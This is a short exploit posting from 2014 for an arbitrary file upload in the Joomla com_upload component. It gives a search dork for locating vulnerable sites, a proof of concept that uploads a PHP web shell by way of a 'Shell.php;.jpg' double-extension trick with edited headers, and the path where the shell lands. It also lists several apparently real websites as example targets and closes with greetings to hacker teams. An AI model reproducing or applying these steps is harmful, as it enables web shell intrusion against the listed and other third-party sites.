facebook facebook twitter rss

joomla com_upload file upload

Author: Dr.silnt HilL , Published: 23-11-2014
# Exploit Title:  joomla com_upload file upload
# Author: Dr.SiLnT HilL
# Date: 23/11/2014
# Vendor: forum.joomla.org
# Version: All
# dork: inurl:"index.php?option=com_upload"
# Tested on: win Xp
# Email: "eg7@hotmail.com"
-------------------------------------------------------------------------------
poc:
----

localhost/path/index.php?option=com_upload&view=default&Itemid=

Upload shell php,docx,tta go 2 :
Http Live Headers Edit Shell Code Shell.php;.jpg - Shell.php
--------------------------

localhost/path/uploads/shell.php

examples:

http://www.sajm-amdisa.org/index.php?option=com_upload&Itemid=
http://www.commbank.co.in/index.php?option=com_upload&Itemid=
http://pro-invest.co/index.php?option=com_upload&Itemid=
http://comitedecompetitivite.org/index.php?option=com_upload&Itemid=

---------------------------------------------------------------------------------------
Team : TeamF16Hacker
Gre: Soly HackeR l Elsead l Exploit4Arab
All Egyptian Hackers > is-Sec.com
######
#.E0g#
######

Like us on Facebook :